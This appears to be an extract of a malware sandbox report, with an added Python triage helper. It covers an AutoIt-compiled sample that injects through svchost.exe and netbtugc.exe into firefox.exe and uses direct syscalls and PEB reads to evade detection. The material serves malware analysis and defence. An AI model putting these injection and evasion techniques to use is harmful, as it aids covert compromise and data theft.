            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE9E0 mov eax, dword ptr fs:[00000030h]2_2_035BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov esi, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]2_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]2_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560854 mov eax, dword ptr fs:[00000030h]2_2_03560854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]2_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]2_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03542840 mov ecx, dword ptr fs:[00000030h]2_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]2_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]2_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]2_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]2_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC810 mov eax, dword ptr fs:[00000030h]2_2_035BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03552835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D483A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D483A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0355E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035FA8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035BC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03530887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356CF50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03604F68 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D0F50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D4F42 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0355AF69 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0355AF69 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D2F60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D2F60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03532F12 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356CF1F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035E6F00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0355EF28 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03604FE7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352EFD8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352EFD8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352EFD8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03532FC8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03532FC8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03532FC8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03532FC8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03570FF6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03570FF6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F1A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F08189 SetUnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtOpenKeyEx: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtTerminateThread: Direct from: 0x77382FCC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtQueryValueKey: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | NtClose: Direct from: 0x77377B2E
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 992
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 92E008
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F1B106 LogonUserW
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00EE3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F2411C SendInput,keybd_event
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F274E7 mouse_event
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CCE 30411252024.exe"
Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F1A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F271FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: UIOYLdBBxOZnTzrp.exe, 00000005.00000000.2244149291.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000002.4604433405.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604417591.0000000001720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
Source: CCE 30411252024.exe, UIOYLdBBxOZnTzrp.exe, 00000005.00000000.2244149291.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000002.4604433405.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604417591.0000000001720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: UIOYLdBBxOZnTzrp.exe, 00000005.00000000.2244149291.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000002.4604433405.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604417591.0000000001720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: CCE 30411252024.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: UIOYLdBBxOZnTzrp.exe, 00000005.00000000.2244149291.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000002.4604433405.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604417591.0000000001720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F065C4 cpuid
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F3091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F5B340 GetUserNameW
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F11E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00EFDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
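The lines above together describe how this sample moves between processes and how its code inspects its own environment. The sample (flagged as a compiled AutoIt script) creates svchost.exe, writes to it and maps a section into it with execute permission; svchost.exe maps a section into the dropped UIOYLdBBxOZnTzrp.exe; netbtugc.exe, started from that process, queues an APC back into it and maps a section into firefox.exe. The Nt* routines are flagged as direct or indirect syscalls, each with the address the call was issued from. The repeated mov eax, dword ptr fs:[00000030h] reads listed further up fetch the PEB pointer (fs:[0x30] in a 32-bit process), which is what code does before checking PEB.BeingDebugged or NtGlobalFlag, or walking PEB.Ldr to resolve APIs without an import table. The Python below is an added triage helper and is not part of the Joe Sandbox report or its tooling: it parses lines in the report's plain-text format (the embedded sample lines are copied from this page; the regular expressions, function names and edge labels are the example's own) and recovers the injection chain, the PEB reads per function and the directly invoked syscalls.

```python
"""Triage helper for Joe Sandbox behaviour-signature lines (added example).

Parses the 'Source: <process> <signature>: <detail>' lines used in the
report above and rebuilds the process-injection chain, the per-function
PEB reads and the Nt* routines flagged as direct syscalls. SAMPLE_LINES
are copied from this report; the regexes and helper names are this
example's own and are not Joe Sandbox code.
"""
import re
from collections import Counter, defaultdict

# Lines copied verbatim from the report (HTML extraction sometimes glues the
# 'Jump to behavior' link text onto the end of a line; the parser tolerates it).
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov ecx, dword ptr fs:[00000030h]2_2_03552835",
    r"Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior",
    r"Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtClose: Direct from: 0x77382B6C",
    r"Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeJump to behavior",
    r"Source: C:\Users\user\Desktop\CCE 30411252024.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 92E008Jump to behavior",
    r'Source: C:\Users\user\Desktop\CCE 30411252024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CCE 30411252024.exe"Jump to behavior',
    r'Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior',
    r'Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior',
]

# Source path ends at the first '.exe'; an optional ' | ' separator is accepted
# so cleaned-up copies of the listing parse too.
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*\|?\s*"
    r"(?P<kind>Code function|Section loaded|Thread APC queued|Memory written|Process created|Nt\w+)"
    r":\s*(?P<detail>.*?)\s*(?:Jump to behavior)?\s*$"
)

# How to pull the target process (and an action qualifier) out of each detail.
TARGET_RE = {
    "Section loaded": re.compile(r"target:\s*(?P<target>.+?\.exe)\s*protection:\s*(?P<how>.+)$"),
    "Thread APC queued": re.compile(r"target process:\s*(?P<target>.+?\.exe)$"),
    "Memory written": re.compile(r"^(?P<target>.+?\.exe)\s*base:\s*(?P<how>[0-9A-Fa-f]+)$"),
    "Process created": re.compile(r'^(?P<target>.+?\.exe)\s*"(?P<how>.*)"$'),
}


def basename(path):
    """Last component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def parse(lines):
    """Yield (source, kind, detail) for every line in the report format."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m["src"], m["kind"], m["detail"].strip()


def injection_chain(lines):
    """Ordered, de-duplicated (source, target, action) edges: one process
    mapping a section into another, writing its memory, queueing an APC
    in it, or creating it."""
    edges = []
    for src, kind, detail in parse(lines):
        rx = TARGET_RE.get(kind)
        m = rx.search(detail) if rx else None
        if not m:
            continue
        if kind == "Section loaded":
            action = "section mapped, " + m["how"].strip()
        elif kind == "Memory written":
            action = "memory written at 0x" + m["how"].upper()
        elif kind == "Thread APC queued":
            action = "APC queued"
        else:
            action = "process created"
        edge = (basename(src), basename(m["target"]), action)
        if edge not in edges:
            edges.append(edge)
    return edges


def peb_readers(lines):
    """Number of fs:[30h] (PEB pointer) reads per function ID."""
    counts = Counter()
    for _src, kind, detail in parse(lines):
        if kind == "Code function" and "fs:[00000030h]" in detail:
            counts[detail.split()[0]] += 1
    return counts


def direct_syscalls(lines):
    """Nt* routine -> set of addresses the report says it was called from directly."""
    stubs = defaultdict(set)
    for _src, kind, detail in parse(lines):
        m = re.match(r"Direct from:\s*(0x[0-9A-Fa-f]+)", detail)
        if kind.startswith("Nt") and m:
            stubs[kind].add(m.group(1))
    return dict(stubs)


if __name__ == "__main__":
    for src, dst, how in injection_chain(SAMPLE_LINES):
        print(f"{src} -> {dst}: {how}")
    print("PEB reads per function:", dict(peb_readers(SAMPLE_LINES)))
    print("direct syscalls:", direct_syscalls(SAMPLE_LINES))
```

Run it over the whole Behavior section of a report rather than this excerpt to get the complete chain. A process that appears only as the target of "Section loaded" or "Thread APC queued" edges and never as a "Process created" target was injected rather than spawned, which is exactly how UIOYLdBBxOZnTzrp.exe shows up here.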

            Stealing of Sensitive Information

